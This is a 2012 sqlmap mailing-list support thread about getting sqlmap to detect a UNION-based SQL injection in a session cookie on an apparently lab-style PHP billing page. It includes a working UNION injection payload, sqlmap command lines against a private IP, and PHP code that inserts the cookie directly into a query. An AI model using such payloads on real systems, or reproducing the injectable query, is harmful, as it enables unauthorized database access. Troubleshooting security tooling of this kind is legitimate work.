Hi Stephen.
There is really a problem here. Could you please update to the latest
revision and do the:
... --flush-session -t traffic.txt -v 3
and send back new session file. It seems that for some reason sqlmap is
doing only one type of boundaries in your case (skipping this simple: ') ...
Also, it would be great if you send a full console output of such clean run
(please, use -v 3).
Kind regards,
Miroslav Stampar
On Sun, Sep 16, 2012 at 9:33 PM, Stephen Shkardoon <s...@ss23.geek.nz>wrote:
> Hi,
>
> This is the HTML from a manual request with sesh cookie set
> to ')%20UNION%20select%201,2,3,4%20--%20
>
> <html>
> <head>
> <link rel='stylesheet' href='css/styles.css'/>
> <title>My Account - Customer Care Centre - Acme Power Co</title>
> </head>
> <body>
>
> <div id='heading'>
> </div>
>
> <div id='menu'>
> <a href='index.php'>Home / Login</a> -
> <a href='account.php'>My Account</a> -
> <a href='support.php'>Contact Support</a> -
> <a href='#'
> onClick='javascript:window.open("hours.php?data=ccc","newwin","width=210,height=200")'>CCC
> Opening Hours</a> -
> <a href='logout.php'>Logout</a>;
> </div>
>
>
> <div id='content'>
> <div id='billz'>
> Hi, 2!<br><br> Have a token:
> 86a2aeef8813bfa37a354e8997c77388<br><br>Please find below your account
> statement, released 04 November 2011. This account is due to be paid on
> <b>05 November 2011</b>. Failure to pay this amount before the due date may
> result in service disruption.<br><br><h3>Account
> Statement</h3><hr><table><tr><td width=200>Account Number</td><td
> width=450>Description of
> Service</td><td>Amount</td></tr></table><hr><table><tr><td
> width=200>1</td><td width=450>Basic Power
> Service</td><td>4</td></tr></table>
> </div>
> </div>
>
> </body>
> </html>
>
> ---------------------------
>
> The relevant bits being "Hi, 2", and the table showing amount of "4" etc.
>
> Thanks,
> ss23
>
> On Mon, Sep 17, 2012 at 6:58 AM, Miroslav Stampar <
> miroslav.stam...@gmail.com> wrote:
>
>> Hi Stephen.
>>
>> From this traffic file it's not really clear if this is exploitable by
>> any mean more than time-based.
>>
>> Could you please send the response you get when you "manually exploit" it
>> with the payload you've mentioned:
>> "sesh=')%20UNION%20select%201,2,3,4%20--%20" ?
>>
>> Kind regards,
>> Miroslav Stampar
>>
>>
>> On Sat, Sep 15, 2012 at 1:33 AM, Stephen Shkardoon <s...@ss23.geek.nz>wrote:
>>
>>> It ran a little over and started testing User-Agent, but it has the
>>> entire log for the session cookie there.
>>> The options I used this time were:
>>> python2 sqlmap.py -u "http://10.100.0.26/account.php"; --cookie="sesh=1"
>>> -t traffic.txt --level=5
>>>
>>> Thanks,
>>> ss23
>>>
>>>
>>> On Sat, Sep 15, 2012 at 10:31 AM, Miroslav Stampar <
>>> miroslav.stam...@gmail.com> wrote:
>>>
>>>> Hi.
>>>>
>>>> In that case could you please send the sqlmap traffic file got by using
>>>> -t traffic.txt along with your standard switches/options?
>>>>
>>>> Kind regards,
>>>> Miroslav Stampar
>>>>
>>>>
>>>> On Sat, Sep 15, 2012 at 12:09 AM, Stephen Shkardoon
>>>> <s...@ss23.geek.nz>wrote:
>>>>
>>>>> Hi,
>>>>>
>>>>> Sorry, my mistake. I just copied the line and altered it to show that
>>>>> the cookie was being used. In the real script, there was no parse error.
>>>>> Nonetheless, sqlmap cannot pull out results.
>>>>>
>>>>> Thanks
>>>>> ss23
>>>>>
>>>>> On Sat, Sep 15, 2012 at 9:55 AM, Miroslav Stampar <
>>>>> miroslav.stam...@gmail.com> wrote:
>>>>>
>>>>>> Hi.
>>>>>>
>>>>>> I am not sure how are you able to "definitely able to pull out
>>>>>> results" as as I can see the problem lies in used PHP (enclosed pair of
>>>>>> single quotes with another pair of single quotes):
>>>>>>
>>>>>> Bad:
>>>>>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
>>>>>> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu
>>>>>> WHERE
>>>>>> sessionid = *'$_COOKIE['sesh']'*)");
>>>>>>
>>>>>> Good 1:
>>>>>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
>>>>>> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu
>>>>>> WHERE
>>>>>> sessionid = *'$_COOKIE[sesh]'*)");
>>>>>>
>>>>>> Good 2:
>>>>>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
>>>>>> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu
>>>>>> WHERE
>>>>>> sessionid = " . *$_COOKIE['sesh'] . "*)");
>>>>>>
>>>>>> With that code of yours you should get an ugly PHP error message:
>>>>>> "Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE,
>>>>>> expecting T_STRING or T_VARIABLE or T_NUM_STRING"
>>>>>>
>>>>>> Also, you could take a look at similar case here [1].
>>>>>>
>>>>>> Kind regards,
>>>>>> Miroslav Stampar
>>>>>>
>>>>>> [1]
>>>>>> http://www.hotscripts.com/forums/php/21179-php-parse-error-parse-error-unexpected-t_encapsed_and_whitespace-expecting-t_strin.html
>>>>>>
>>>>>> On Fri, Sep 14, 2012 at 8:08 PM, Stephen Shkardoon <s...@ss23.geek.nz
>>>>>> > wrote:
>>>>>>
>>>>>>> Hi all,
>>>>>>>
>>>>>>> Trying to do a (simple) injection with sqlmap, and I can't seem to
>>>>>>> coax it into getting it right.
>>>>>>> The PHP source looks something like:
>>>>>>>
>>>>>>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
>>>>>>> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu
>>>>>>> WHERE
>>>>>>> sessionid = '$_COOKIE['sesh']')");
>>>>>>>
>>>>>>> and then it displays the fields it pulled out.
>>>>>>>
>>>>>>> The command(s) I've tried look something like ./sqlmap.py -u
>>>>>>> site.com/script.php --cookie="sesh=1" --cookie-urlencode --level=5
>>>>>>> --risk=5. However, the only injection point it finds is AND/OR
>>>>>>> time-based
>>>>>>> blind, which is horribly slow. Of course, manually, I can do a
>>>>>>> sesh=')%20UNION%20select%201,2,3,4%20--%20 or similar, so
>>>>>>> I'm definitely able to pull out results.
>>>>>>>
>>>>>>> Anything I can do to push sqlmap in the right direction?
>>>>>>>
>>>>>>> Thanks,
>>>>>>> ss23
>>>>>>>
>>>>>>>
>>>>>>> ------------------------------------------------------------------------------
>>>>>>> Got visibility?
>>>>>>> Most devs has no idea what their production app looks like.
>>>>>>> Find out how fast your code is with AppDynamics Lite.
>>>>>>> http://ad.doubleclick.net/clk;262219671;13503038;y?
>>>>>>> http://info.appdynamics.com/FreeJavaPerformanceDownload.html
>>>>>>> _______________________________________________
>>>>>>> sqlmap-users mailing list
>>>>>>> sqlmap-users@lists.sourceforge.net
>>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>>>
>>>>>>>
>>>>>>
>>>>>>
>>>>>> --
>>>>>> Miroslav Stampar
>>>>>> http://about.me/stamparm
>>>>>>
>>>>>
>>>>>
>>>>
>>>>
>>>> --
>>>> Miroslav Stampar
>>>> http://about.me/stamparm
>>>>
>>>
>>>
>>
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>>
>
>
--
Miroslav Stampar
http://about.me/stamparm
------------------------------------------------------------------------------
Live Security Virtual Conference
Exclusive live event will cover all the ways today's security and
threat landscape has changed and how IT managers can respond. Discussions
will include endpoint security, mobile security and the latest in malware
threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
